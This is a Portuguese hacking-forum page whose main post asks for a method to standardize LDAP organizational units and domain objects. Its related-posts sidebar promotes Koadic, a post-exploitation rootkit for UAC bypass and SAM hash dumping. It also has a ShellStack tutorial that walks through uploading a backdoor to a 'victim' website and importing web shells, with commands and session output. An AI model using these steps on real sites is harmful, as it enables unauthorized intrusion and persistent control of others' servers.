Ir para conteúdo
thdr

Como desenvolver uma estrutura padronizada de objetos de domínio no LDAP

Recommended Posts

Boa tarde galera, alguém conhece alguma RFC ou tem algum material ou método de padronização para desenvolver uma estrutura de unidades organizacionais e objetos de domínio no LDAP ?, Obrigado desde já !!

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora




  • Conteúdo Similar

    • Por kfglkfgl
      Boa noite galera, estou tendo um leve probleminha na instalação do VirtualBox dentro do Kali Linux, alguém consegue me dar uma força? Estou tendo grandes problemas com algum drive que eu não consigo instalar e não sei qual é, mas creio que tem a ver com o vboxdrv e o virtualbox- dkms, aqui está os erros quando eu instalo o VirtualBox
      apt-get install virtualbox Lendo listas de pacotes... Pronto Construindo árvore de dependências Lendo informação de estado... Pronto The following additional packages will be installed: virtualbox-qt Pacotes sugeridos: vde2 virtualbox-guest-additions-iso Os NOVOS pacotes a seguir serão instalados: virtualbox virtualbox-qt 0 pacotes atualizados, 2 pacotes novos instalados, 0 a serem removidos e 465 não atualizados. É preciso baixar 0 B/24,0 MB de arquivos. Depois desta operação, 103 MB adicionais de espaço em disco serão usados. Você quer continuar? [S/n] s A seleccionar pacote anteriormente não seleccionado virtualbox. (Lendo banco de dados ... 340866 ficheiros e directórios actualmente instalados.) A preparar para desempacotar .../virtualbox_5.1.28-dfsg-2_amd64.deb ... A descompactar virtualbox (5.1.28-dfsg-2) ... A seleccionar pacote anteriormente não seleccionado virtualbox-qt. A preparar para desempacotar .../virtualbox-qt_5.1.28-dfsg-2_amd64.deb ... A descompactar virtualbox-qt (5.1.28-dfsg-2) ... A processar 'triggers' para mime-support (3.60) ... A processar 'triggers' para desktop-file-utils (0.23-2) ... A processar 'triggers' para menu (2.1.47+b1) ... Configurando virtualbox (5.1.28-dfsg-2) ... Job for virtualbox.service failed because the control process exited with error code. See "systemctl status virtualbox.service" and "journalctl -xe" for details. invoke-rc.d: initscript virtualbox, action "restart" failed. ● virtualbox.service - LSB: VirtualBox Linux kernel module Loaded: loaded (/etc/init.d/virtualbox; generated; vendor preset: enabled) Active: failed (Result: exit-code) since Mon 2017-10-16 00:40:50 -02; 10ms ago Docs: man:systemd-sysv-generator(8) Process: 4901 ExecStart=/etc/init.d/virtualbox start (code=exited, status=1/FAILURE) out 16 00:40:50 LoSNH systemd[1]: Starting LSB: VirtualBox Linux kernel module... out 16 00:40:50 LoSNH virtualbox[4901]: Loading VirtualBox kernel modules...No suitable module for running kernel found ... failed! out 16 00:40:50 LoSNH virtualbox[4901]: failed! out 16 00:40:50 LoSNH systemd[1]: virtualbox.service: Control process exited, code=exited status=1 out 16 00:40:50 LoSNH systemd[1]: Failed to start LSB: VirtualBox Linux kernel module. out 16 00:40:50 LoSNH systemd[1]: virtualbox.service: Unit entered failed state. out 16 00:40:50 LoSNH systemd[1]: virtualbox.service: Failed with result 'exit-code'. A processar 'triggers' para systemd (234-3) ... A processar 'triggers' para man-db (2.7.6.1-2) ... A processar 'triggers' para shared-mime-info (1.8-1) ... A processar 'triggers' para gnome-menus (3.13.3-9) ... A processar 'triggers' para hicolor-icon-theme (0.17-1) ... Configurando virtualbox-qt (5.1.28-dfsg-2) ... A processar 'triggers' para menu (2.1.47+b1) ... Aqui está um print do VirtualBox tentando rodar um SO
      Imagem
      Espero que alguém consiga me ajudar, agradeço desde já.
    • Visitante
      Por Visitante
      Olá, marujos.
      Venho hoje trazer a vocês um pequeno utilitário, que fiz nas horas vagas (na verdade fiz durante o trabalho, pois estava entediado.)
      Trata-se de um criptografador de arquivos e pastas. Apos selecionar o arquivo/pasta desejada, você deve informar um senha de 8 dígitos (a-z, A-Z, 0-9) para que seja gerado um arquivo criptografado. O próprio programa é capaz de descriptografar os arquivos, se a senha informada for a mesma que a senha digitada na hora da criação. Por enquanto, ele está bem simples, pois não tenho muito tempo sobrando. E precisaria muito da ajuda de alguns solidários que possam testa-lo. Por ser um programa novo, peço para que aqueles que decidirem usar, não coloquem arquivos importantes para ser criptografados sem possuir um backup, pois como todos sabem, bugs acontecem e só são descobertos depois de acontecer.
      Ele tem um sistema de atualização online, então caso eu corrija algum erro, ele irá perguntar ao usuário se o mesmo deseja atualiza-lo. Esta é a única função que utiliza a internet, então, caso fiquem inseguros de colocar seus arquivos nele, podem testa-lo sem internet.
      Pretendo fazer algumas atualizações bacanas nele no futuro não muito distante, mas pra isso preciso testar a principal função dele que é criptografar e descriptografar arquivos!
      Quem puder ajudar testando e deixando sua opinião, agradeço muito.
      Segue algumas imagens dele e o download, fiquem à vontade para fazer qualquer tipo de teste em relação a vírus e etc.

       
      DOWNLOAD:  https://github.com/Fugitiv3/SimpleKey
      * PROGRAMA TOTALMENTE OPEN SOURCE *
      * FEITO EM VB *
       
    • Por Fabio Castro
       
      Koadic, ou COM Command & Control, é um rootkit pós-exploração do Windows semelhante a outras ferramentas de teste de penetração como o Meterpreter e o Powershell Empire. A principal diferença é que o Koadic faz a maioria de suas operações usando o Windows Script Host (também conhecido como JScript / VBScript), com compatibilidade no núcleo para suportar uma instalação padrão do Windows 2000 sem pacotes de serviço (e potencialmente versões pares do NT4) todo o caminho Através do Windows 10.
       
      Video:  https://youtu.be/FNYnmPo3kTA
      1. Hook Zombie
      2. Bypass UAC to run as Administrator
      3. Dump SAM hashes
      Twitter: https://twitter.com/fbctf 
      Github: https://github.com/zerosum0x0/koadic
    • Por Loock
      [Material / Conteúdo / Linux]
       
      - Olá soldados da Fsociety Brasil! 
      Venho hoje compartilhar uma pasta no MEGA, que nela contém um vasto conteúdo de "KALI LINUX, FEDORA, DEBIAN, FORENSE LINUX, LINUX EM REDES DE COMPUTADORES" e outros..

      ( Espero que gostem  )

      LINK --> https://goo.gl/nN3eQh
      LINK --> https://goo.gl/nN3eQh 
      LINK --> https://goo.gl/nN3eQh
    • Por Prosniper
      Uma ferramenta baseada em PHP que ajuda você a gerenciar todos os seus sites Backdoored de forma eficiente. 

      O ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "HACKERS" que desejam manter uma faixa de cada site que eles cortaram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar o URL de backdoor no shells.txt presente no diretório da ferramenta.
      Com ShellStack você pode
      Importar shells PHP Obter detalhes do servidor Carregar arquivos do seu sistema usando seu terminal E acima de tudo, você pode gerenciar suas portas traseiras de forma eficiente  Como usar
      git clone https://github.com/Tuhinshubhra/shellstack cd shellstack php shellstack.php generatebd saia utilizando CTRL + C  Isso gerará um arquivo de backdoor no mesmo diretório que a ferramenta em um arquivo chamado backdoor.php Carregue o arquivo Backdoor para o site da Vítima Copie o URL do Backdoor e cole-o no arquivo shells.txt presente no diretório da ferramenta e salve-o ( Cada backdoor está separado por uma nova linha ) php shellstack.php Digite o número de série atribuído ao Backdoor O resto é bastante auto-explicativo Veja o vídeo aqui:  Requisitos
      php curl Exemplo
      [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php ________________________________________________________________________________ _______ _ _ _______ _______ _______ _______ _______ _ _ |______ |_____| |______ | | |______ | |_____| | |____/ ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ ________________________________________________________________________________ Simple Backdoor Management System Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra Shout Out: LulZSec India ================================================================================ List Of Backdoors: 0. http://localhost/backdoor.php ============================================= [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 [+] Shell Selected: http://localhost/backdoor.php [+] Validating Backdoor: Backdoor Found! List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):2 [+] Server Info [i] Sending Request And Getting Response... [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 [i] Server IP: 127.0.0.1 Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):1 List Of Shells =============== [1] Dhanush shell {User & Pass : shellstack123} [2] B374K shell {Pass : shellstack123} [3] Kurama shell V.1.0 {Pass : red} [4] WSO shell {Pass : shellstack123} [5] MiNi shell {User & Pass : shellstack123} [#] Select Shell To Import(1-5):1 [i] Importing Shell... [i] Sending Request And Getting Response... [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):5 [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# Versão 
      Versão 1.0 Screenshot

      Tutorial retirado do site:  http://www.kitploit.com
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.